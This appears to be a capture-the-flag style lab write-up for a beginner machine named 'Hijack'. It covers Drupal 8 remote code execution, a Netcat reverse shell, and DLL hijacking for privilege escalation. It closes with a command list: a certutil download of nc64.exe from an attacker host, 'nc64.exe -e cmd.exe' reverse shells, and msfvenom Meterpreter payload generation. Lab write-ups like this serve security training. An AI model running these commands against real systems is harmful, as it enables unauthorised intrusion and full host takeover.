Premise
In this post, we demonstrated the basic exploitation of the Drupal content management system to gain a limited shell on the remote host. We escalated our privileges by generating a custom DLL payload and replace the target DLL file with our payload. We used a lab machine called ‘Hijack’.
Machine Name: Hijack
Difficulty: Beginner
Skills Learned
- Drupal
- OWASP
- DLL Injection
Finding the Way In
I started by running an Nmap scan, which revealed a web server running Drupal 8. I checked the robots.txt
file for any interesting directories and then headed over to the main page. I found a login page, but instead of trying to brute-force my way in, I decided to look for a more elegant solution.
I knew that Drupal 8 had a few known remote code execution vulnerabilities, so I searched for an exploit and found a Bash script that looked promising. The script was designed to echo a simple message to a file, but I modified it to download and execute a reverse shell payload from my machine.
After a bit of trial and error with different payloads, I was able to use the exploit to download Netcat to the target machine and then use it to get a reverse shell. I now had a foothold on the machine, but I was still just a regular user.
Becoming the Admin
My next goal was to become the administrator. I started by enumerating the services running on the machine and found one called “hijack.” The name was a dead giveaway, so I decided to investigate it further.
I checked the permissions on the service’s executable file and found that I didn’t have write access. However, I did have write access to the “libraries” directory where the service stored its DLL files. This was the perfect opportunity for a DLL hijacking attack.
I used msfvenom
to create a malicious DLL file with a Meterpreter payload and named it custom.dll
to match the name of one of the legitimate DLLs. I then downloaded my malicious DLL to the “libraries” directory, overwriting the original file.
All that was left to do was start the “hijack” service. As soon as I did, the service loaded my malicious DLL, which executed my payload and gave me a Meterpreter session with full administrator privileges! 👑
Commands I Used
Here are some of the key commands I used during this process:
- Searching for exploits:
searchsploit drupal 8
- Generating a Meterpreter payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o win.exe
- Starting a Python web server:
python -m http.server
- Downloading a file with
certutil
:certutil.exe -urlcache -f http://<IP>:<PORT>/nc64.exe nc64.exe
- Setting up a Netcat listener:
nc -lvp <PORT>
- Getting a reverse shell with Netcat:
nc64.exe -e cmd.exe <IP> <PORT>
- Checking file permissions:
icacls <DIRECTORY>
- Generating a malicious DLL:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll -o custom.dll
- Starting a service:
sc start hijack